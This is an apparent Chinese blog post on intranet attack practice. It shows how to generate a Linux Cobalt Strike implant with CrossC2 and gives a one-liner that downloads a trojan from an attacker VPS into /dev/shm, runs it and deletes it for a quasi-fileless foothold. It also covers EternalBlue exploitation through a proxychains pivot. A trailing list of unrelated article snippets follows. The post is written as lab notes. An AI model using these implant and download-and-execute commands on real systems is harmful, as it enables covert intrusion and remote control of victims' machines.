一些近来对内网攻防的思考
我知道我最近托更托了很久了,其实也不是小编懒啊
这小编也是一直在写,但是遇到的问题比较多(我太菜了),所以一直拖着。
但是总不能不更吧 
那就讲一下进来的一些内网攻防的思考吧
1.CrossC2上线Linux到CS(成功)
我么众所周知,CS是不能生成以及上线Linux的(再不配置插件的情况下),那么我们今天就带大家来配一下这个上线cs的插件
我就去kali上演示啦(你们在VPS上也是一样的,不过我VPS上已经配置好了,就不麻烦再配一次了)
我们先去github上下载这两个文件
GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload
然后我们先去解压缩那个ZIP
然后我们去CS加载这两个文件
这样,我们的CS就配置好了,然后我们去生成Linux的木马,找到另外的那个gen...linux的
先改权限,然后生成
./genCrossC2.Linux 你的VPS的ip VPS监听器的端口 null null Linux x64 木马名字所以我就这么写咯
./genCrossC2.Linux 192.168.246.170 9191 null null Linux x64 muma这里可以看见它的支持版本是4.9-4.1 ,要注意版本噢
然后我们去配置CS的监听器(只支持https 和tcp)
这个生成木马我应该就不用教了吧,不过记得要和木马对应IP和端口噢
然后就是去目标Linux上运行木马了!!!
但是呢,就真无语了
cs非常的安静
就连本地自己启动都上线不了。。。。。。。
我真无语了,那就用VPS上线一下吧!!!
还是先创建监听器,然后生成🐎
丢到目标服务器上去运行
可以看见两台机器都能上线,看来以后还是用VPS吧!!!
2.Bash无文件落地??
我们众所周知,Windos最出名的无文件落地,一定是powershell无文件落地(当然还有别的)
但是Linux呢??? 那肯定得有对应的无文件落地的啦!!! 下面这个连接讲的很详细
blogs/持久控制/Linux/Linux下的无文件攻击.md at master · aplyc1a/blogs · GitHub
这些方法好是好,但是对于脚本小子不友好!!! 假如我现在有一个Linux的马,然后又是脚本小子呢??
::: 我也想无文件啊!!!
那么就有接下来的命令
wget -U O -O - http://公网VPS/木马 > /dev/shm/木马 && chmod +x /dev/shm/木马 && /dev/shm/木马 && rm -f /dev/shm/木马
- 使用
wget命令从公网VPS的地址下载文件。 >符号将下载的文件内容输出到/dev/shm/木马文件中。&&符号表示如果前一个命令执行成功,则继续执行下一个命令。- 使用
chmod命令添加/dev/shm/木马文件的执行权限。 - 使用
/dev/shm/木马命令执行该文件,这个文件可能是一个 shell 脚本或可执行文件。 - 最后,使用
rm -f命令删除/dev/shm/木马文件。
这个命令下载的文件被保存在
/dev/shm目录下,该目录是一个临时文件系统,通常被用作内存文件系统,因此文件实际上是保存在内存中的。因此,即使在磁盘上删除了文件,内存中仍然存在这个文件的拷贝,因此删除磁盘上的文件不会影响正在内存中执行的程序。
所以你觉得这个算是无文件吗????
::感觉似乎不算,毕竟还有有文件落地得(只不过达到了一种类似无文件得效果)
那么下面就来演示一下,现在VPS上面开一个http得服务
然后直接一句话bash无文件落地
wget -U O -O - http://VPS:6888/shell > /dev/shm/shell && chmod +x /dev/shm/shell && /dev/shm/shell && rm -f /dev/shm/shell
直接上线
然后我们去看一下是否真的无文件(看一下目录下有没有)
但是在内存中还是能看见得
3.永恒之蓝shell进去会建立一个session?
以前我不是做过这样的一个实验吗?? 挂着跳板机去打内网的机器,很多时候本地不成功!!
那么我们今天Wireshark的角度上去分析一下!!!!!
首先是一台Win7(存在永恒之蓝)
然后就是一台Server(也存在永恒之蓝)
首先我的Kali是192.168.246.170,先把他放在同一网段来打一下先
然后我们再去打一下Win7
好,两台都是能打到的,那么,我们把Win7放在内网,winserver放在公网
然后win7就变成内网52这个网段
然后winserver是双网卡,同时通两个网
然后我们去Winserver上开一个socks5的隧道!!!
然后我用kali的proxychains去连接
然后我们用proxychains去启动msf
果然打不成功,这个可能是因为虚拟机网络摇曳的原因,然而,今天我想讲的是另外一个东西
还是拿回我们原来的那个攻击成功的机器,我们众所周知,永恒之蓝是通过别人开放的445端口进行攻击的,那么他是通过445进行连接的吗????
我们在进攻成功之后,就可以有一个meterpreter的界面,然后我们去看一下连接
我们不难发现,我们并不是通过445端口进行连接的,而是通过重新找了一个端口来连接我们的kali 那么另外又一个问题来了,我们shell的时候,会建立一个新的连接吗??(PORT)
于是我shell了进去,并且抓了一下数据包,我们不难发现,我们kali都是通过用的4444端口进行对win7的通信,并不存在说新建立了一个端口来通信!!! 那执行命令呢????
可以看到它的整个tcp流,也是没有建立新的端口
所以我们就可以得到一个结论,只要我们能通过proxychains打到内网,那么就不用担心会新建端口导致的流量不通!!!
所以以上失败的原因就是虚拟机摇曳!!!!!!
以上,就是一些暂时的想法了,写完这篇,小编又要投身到另一篇csdn上了!!!!
相关文章:
一些近来对内网攻防的思考
我知道我最近托更托了很久了,其实也不是小编懒啊 这小编也是一直在写,但是遇到的问题比较多(我太菜了),所以一直拖着。 但是总不能不更吧 那就讲一下进来的一些内网攻防的思考吧 1.CrossC2上线Linux到CS(成功) …...
数据结构--顺序表和链表的区别
顺序表和链表之间各有优劣,我们不能以偏概全,所以我们在使用时要关注任务的注重点,以此来确定我们要使用两者中的哪一个。 不同点: 存储空间上: 顺序表在物理结构上是一定连续的,而链表(这里以带头双向循环…...
【技术分享】 OPC UA安全策略证书简述
那什么是OPC UA证书?用途是什么? 简单来说它是身份验证和权限识别。 OPC UA使用X.509证书标准,该标准定义了标准的公钥格式。建立UA会话的时候,客户端和服务器应用程序会协商一个安全通信通道。数字证书(X.509&#x…...
【Neo4jJDK开箱即用的安装全流程】
neo4j:命令行本地访问loclhost neo4j:命令行本地访问loclhost2 neo4j操作 Neo4j桌面版数据库导出导入 Neo4j安装与配置以及JDK安装与配置教程(超详细) Neo4j 安装、使用教程 Neo4j安装教程 Neo4J桌面版的配置和连接Pycharm jdk-neo对应版本 JDK ORACLE中…...
Linux 操作系统多路IO复用
1.多路IO复用 多路I/O复用是通过一种机制,可以监视多个描述符,一旦某个描述符就绪(一般是读就绪或者写就绪),能够通知程序进行相应的读写操作。 这个机制能够通过select/poll/eroll等来使用。这些函数都可以同时监视多…...
读取shape文件中数据
读取shape文件中数据 pom文件中引入依赖 <dependency><groupId>org.geotools</groupId><artifactId>gt-shapefile</artifactId><version>26.4</version></dependency>如果jar包下载不下来,在pom中添加下geotools的仓库 <…...
基于STM32F401RET6智能锁项目(使用库函数点灯、按键)
点灯硬件原理图 1、首先,我们查看一下原理图,找到相对应的GPIO口 LED_R低电平导通,LED4亮,所以LED_R的GPIO口需要配置一个低电平才能亮; LED_G低电平导通,LED3亮,所以LED_R的GPIO口需要配置一…...
网络层协议之 IP 协议
IP 协议格式 4 位版本:此处的取值只有两个,4(IPv4)和 6(IPv6),即指定 IP 协议的版本。 4 位首部长度:描述了 IP 报头多长,IP 报头是变长的,因为报头中的选项部…...
SpringBoot 实现对提供的接口进行 AES (加密,解密)
业务来源: 最近工作中,领导要求给别的项目组的小伙伴提供几个接口,要求对接口的参数进行解密操作,然后对返回的数据进行加密操作。 这时我想到了AES AES 是对称加密算法,优点:加密速度快;缺点…...
ASP.NET学生成绩管理系统
摘要 本系统依据开发要求主要应用于教育系统,完成对日常的教育工作中学生成绩档案的数字化管理。开发本系统可使学院教职员工减轻工作压力,比较系统地对教务、教学上的各项服务和信息进行管理,同时,可以减少劳动力的使用…...
谁考了第k名C++
题目描述 在一次考试中,每个学生的成绩都不相同,现知道了每个学生的学号和成绩,求考第k名学生的学号和成绩。(按成绩从大到小排列) 输入 第一行有两个整数,分别是学生的人数n(1≤n≤100&…...
多线服务器的优势有哪些?
服务器中包含着多线服务器、双线服务器和单线服务器等,其中多线服务器可以支持多个IP地址,今天小编就来带领大家一些来了解一下多线服务器的优势有哪些吧! 多线服务器是在一个互联网数据中心,通过特殊的技术手段将不同的多家网络接…...
vue + element-plus 开发中遇到的问题
1.问题之路由守卫 初写路由守卫,对于next()的理解不是很透彻,就想着都放行,不然看不到效果,结果控制台出现了警告,想着报黄的问题就不是问题,但仔细一看发现他说,如果再生产阶段就会失败&#x…...
使用java远程提交flink任务到yarn集群
使用java远程提交flink任务到yarn集群 背景 由于业务需要,使用命令行的方式提交flink任务比较麻烦,要么将后端任务部署到大数据集群,要么弄一个提交机,感觉都不是很离线。经过一些调研,发现可以实现远程的任务发布。…...
麻了!新增4.1分,CCF-C类,2区毕业神刊,被标记On Hold!
本周投稿推荐 SSCI • 2区社科类,3.0-4.0(社科均可) EI • 计算机工程类(接收广,录用极快) SCI&EI • 4区生物医学类,1.5-2.0(录用率99%) • 1区工程类&#…...
tomcat 的启动流程
tomcat 的启动流程 中 使用的Lifecycle 生命流程 。在这里还使用了设计模式中的模板模式(LifecycleBase 是一个模板类) init()方法 start() 方法 container 的处理...
YOLOv9全网最新改进系列::YOLOv9完美融合双卷积核(DualConv)来构建轻量级深度神经网络,目标检测模型有效涨点神器!!!
YOLOv9全网最新改进系列::YOLOv9完美融合双卷积核(DualConv)来构建轻量级深度神经网络,目标检测模型有效涨点神器!!! YOLOv9原文链接戳这里,原文全文翻译请关注B站Ai学术叫叫首er …...
PCIE协议-2-事务层规范-MEM/IO/CFG request rules
2.2.7 内存、I/O和配置请求规则 以下规则适用于所有内存、I/O和配置请求。每种类型的请求还有特定的额外规则。 所有内存、I/O和配置请求除了常见的头标字段外,还包括以下字段:requester ID[15:0]和Tag[9:0],形成事务ID。Last DW BE[3:0] a…...
jmeter分布式集群压测
目的:通过多台机器同时运行 性能压测 脚本,模拟更好的并发压力 简单点:就是一个人(控制机controler/调度机 master)做一个项目的时候,压力有点大,会导致结果不理想,这时候找几个人&a…...
美国加州正测试ChatGPT等生成式AI,在4大部门应用
5月11日,美联社消息,美国加州政府正在测试ChatGPT等生成式AI,应用在税收和收费管理部、交通部、公共卫生部以及卫生与公众服务部4大部门。 测试时间6个月,为其提供技术支持的一共有5家公司,分别是OpenAI、Anthropic、…...
工业安全零事故的智能守护者:一体化AI智能安防平台
前言: 通过AI视觉技术,为船厂提供全面的安全监控解决方案,涵盖交通违规检测、起重机轨道安全、非法入侵检测、盗窃防范、安全规范执行监控等多个方面,能够实现对应负责人反馈机制,并最终实现数据的统计报表。提升船厂…...
mongodb源码分析session执行handleRequest命令find过程
mongo/transport/service_state_machine.cpp已经分析startSession创建ASIOSession过程,并且验证connection是否超过限制ASIOSession和connection是循环接受客户端命令,把数据流转换成Message,状态转变流程是:State::Created 》 St…...
FastAPI 教程:从入门到实践
FastAPI 是一个现代、快速(高性能)的 Web 框架,用于构建 API,支持 Python 3.6。它基于标准 Python 类型提示,易于学习且功能强大。以下是一个完整的 FastAPI 入门教程,涵盖从环境搭建到创建并运行一个简单的…...
【ROS】Nav2源码之nav2_behavior_tree-行为树节点列表
1、行为树节点分类 在 Nav2(Navigation2)的行为树框架中,行为树节点插件按照功能分为 Action(动作节点)、Condition(条件节点)、Control(控制节点) 和 Decorator(装饰节点) 四类。 1.1 动作节点 Action 执行具体的机器人操作或任务,直接与硬件、传感器或外部系统…...
Springcloud:Eureka 高可用集群搭建实战(服务注册与发现的底层原理与避坑指南)
引言:为什么 Eureka 依然是存量系统的核心? 尽管 Nacos 等新注册中心崛起,但金融、电力等保守行业仍有大量系统运行在 Eureka 上。理解其高可用设计与自我保护机制,是保障分布式系统稳定的必修课。本文将手把手带你搭建生产级 Eur…...
详解:相对定位 绝对定位 固定定位)
css的定位(position)详解:相对定位 绝对定位 固定定位
在 CSS 中,元素的定位通过 position 属性控制,共有 5 种定位模式:static(静态定位)、relative(相对定位)、absolute(绝对定位)、fixed(固定定位)和…...
学校时钟系统,标准考场时钟系统,AI亮相2025高考,赛思时钟系统为教育公平筑起“精准防线”
2025年#高考 将在近日拉开帷幕,#AI 监考一度冲上热搜。当AI深度融入高考,#时间同步 不再是辅助功能,而是决定AI监考系统成败的“生命线”。 AI亮相2025高考,40种异常行为0.5秒精准识别 2025年高考即将拉开帷幕,江西、…...
初学 pytest 记录
安装 pip install pytest用例可以是函数也可以是类中的方法 def test_func():print()class TestAdd: # def __init__(self): 在 pytest 中不可以使用__init__方法 # self.cc 12345 pytest.mark.api def test_str(self):res add(1, 2)assert res 12def test_int(self):r…...
《C++ 模板》
目录 函数模板 类模板 非类型模板参数 模板特化 函数模板特化 类模板的特化 模板,就像一个模具,里面可以将不同类型的材料做成一个形状,其分为函数模板和类模板。 函数模板 函数模板可以简化函数重载的代码。格式:templa…...
多光源(Multiple Lights))
C++.OpenGL (14/64)多光源(Multiple Lights)
多光源(Multiple Lights) 多光源渲染技术概览 #mermaid-svg-3L5e5gGn76TNh7Lq {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-3L5e5gGn76TNh7Lq .error-icon{fill:#552222;}#mermaid-svg-3L5e5gGn76TNh7Lq .erro…...